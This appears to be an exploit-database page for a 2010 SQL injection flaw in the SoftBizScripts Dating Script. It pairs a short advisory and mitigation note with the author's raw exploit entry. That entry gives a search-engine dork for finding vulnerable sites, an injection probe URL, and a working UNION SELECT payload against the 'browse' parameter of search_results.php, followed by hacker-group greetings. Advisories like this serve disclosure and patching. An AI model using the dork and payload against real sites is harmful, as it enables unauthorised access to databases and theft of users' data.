SoftBizScripts Dating Script SQL Injection Vunerability

vendor:

Dating Script

by:

41.w4r10r

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Dating Script

Affected Version From: Not specified

Affected Version To: Not specified

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Apache/Unix

2010

SoftBizScripts Dating Script SQL Injection Vunerability

The SoftBizScripts Dating Script is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting malicious SQL queries into the 'browse' parameter of the search_results.php page. This allows the attacker to retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input and use prepared statements or parameterized queries to prevent SQL Injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: SoftBizScripts Dating Script SQL Injection Vunerability
# Date: 29-4-2010
# Author: 41.w4r10r
# Vendor Link : http://softbizscripts.com/
# Version: Web Application
# Tested on: Apcahe/Unix
# CVE : [if exists]
# Dork :  inurl:"search_results.php?browse=1"
# Code :
---------------------------------------------------------------------------------------
############################################################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber
Warriors]
#Thanks:
SaiSatish,FB1H2S,Godwin_Austin,Micr0,Harin,Jappy,Dark_Blue,sid3^3f3c7
#Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d
#Catch us at www.andhrahackers.com or www.teamicw.in
############################################################################



Exploited Link :

http://example.com/search_results.php?browse=1'


example:

http://[site]/search_results.php?browse=-1+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,version(),6,7,8,9--




#41.w4r10r mailto:41.w4r10r@andhrahackers.com